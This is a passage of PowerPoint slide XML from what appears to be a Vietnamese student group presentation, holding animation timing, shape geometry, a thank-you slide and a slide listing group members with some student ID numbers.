                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="11" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="13"/>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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="18"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="17" presetID="16" presetClass="entr" presetSubtype="21"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="20" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" grpId="0"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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="29" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="with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barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="19"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="32" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="10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2" grpId="0"/>
      <p:bldP spid="18" grpId="0"/>
      <p:bldP spid="8" grpId="0"/>
      <p:bldP spid="10"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1752600" y="5144530"/>
            <a:ext cx="12701386" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="10800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9000">
                <a:solidFill>
                  <a:srgbClr val="705E51"/>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Cảm ơn thầy và các bạn đã lắng nghe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="-2068688"/>
            <a:ext cx="17465828" cy="6986331"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="2540000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6350000" cy="2540000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="6350000" h="2540000">
                  <a:moveTo>
                    <a:pt x="0" y="2159000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="381000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="170180"/>
                    <a:pt x="170180" y="0"/>
                    <a:pt x="381000" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="5969000" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6179820" y="0"/>
                    <a:pt x="6350000" y="170180"/>
                    <a:pt x="6350000" y="381000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="6350000" y="2159000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="6350000" y="2369820"/>
                    <a:pt x="6179820" y="2540000"/>
                    <a:pt x="5969000" y="2540000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="381000" y="2540000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="170180" y="2540000"/>
                    <a:pt x="0" y="2369820"/>
                    <a:pt x="0" y="2159000"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect t="-4062" b="-4062"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028700" y="5457678"/>
            <a:ext cx="266700" cy="8220221"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="279400" cy="8531991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-2880818" y="5492423"/>
              <a:ext cx="6041036" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-1105778" y="1105778"/>
              <a:ext cx="2490955" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="279400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="9A6547"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>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813705" y="0"/>
            <a:ext cx="5143500" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3175000" cy="6350000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="3175000" cy="6350000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3175000" h="6350000">
                  <a:moveTo>
                    <a:pt x="2667000" y="6350000"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="508000" y="6350000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="227330" y="6350000"/>
                    <a:pt x="0" y="6122670"/>
                    <a:pt x="0" y="5842000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="508000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="227330"/>
                    <a:pt x="227330" y="0"/>
                    <a:pt x="508000" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2667000" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2947670" y="0"/>
                    <a:pt x="3175000" y="227330"/>
                    <a:pt x="3175000" y="508000"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3175000" y="5842000"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3175000" y="6122670"/>
                    <a:pt x="2947670" y="6350000"/>
                    <a:pt x="2667000" y="6350000"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:blipFill>
              <a:blip r:embed="rId2"/>
              <a:stretch>
                <a:fillRect l="-26063" r="-170507"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15253096" y="1566066"/>
            <a:ext cx="2110979" cy="503878"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2814638" cy="671838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="693266" cy="671838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693266" h="671838">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693266" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693266" y="671838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67183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6" name="Freeform 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2121372" y="0"/>
              <a:ext cx="693266" cy="671838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693266" h="671838">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693266" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693266" y="671838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67183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7" name="Freeform 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1059807" y="0"/>
              <a:ext cx="693266" cy="671838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693266" h="671838">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693265" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693265" y="671838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67183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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17154525" y="5457679"/>
            <a:ext cx="209550" cy="6398994"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="279400" cy="8531991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-2880818" y="5492423"/>
              <a:ext cx="6041036" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="30231A"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-1105778" y="1105778"/>
              <a:ext cx="2490955" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="279400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="9A6547"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057217" y="1228725"/>
            <a:ext cx="8115300" cy="2686056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Danh sách thành viên</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC40EE38-C7F9-0886-16BA-BEBB5E6800C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057216" y="4009877"/>
            <a:ext cx="8649383" cy="5334794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Đức</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Mạnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Phát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – 21010471</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Châu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Thoại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – 21009641</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Trần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Tuấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Khang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" u="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Cabin Medium" panose="0000060000000000000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2" name="Group 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457201" y="2324100"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="0" y="49134"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="49134"/>
              <a:ext cx="3271246" cy="2164112"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3271246" h="2164112">
                  <a:moveTo>
                    <a:pt x="57855" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3213391" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3228735" y="0"/>
                    <a:pt x="3243451" y="6095"/>
                    <a:pt x="3254301" y="16945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3265150" y="27795"/>
                    <a:pt x="3271246" y="42511"/>
                    <a:pt x="3271246" y="57855"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3271246" y="2106257"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3271246" y="2121601"/>
                    <a:pt x="3265150" y="2136317"/>
                    <a:pt x="3254301" y="2147166"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3243451" y="2158016"/>
                    <a:pt x="3228735" y="2164112"/>
                    <a:pt x="3213391" y="2164112"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="57855" y="2164112"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="42511" y="2164112"/>
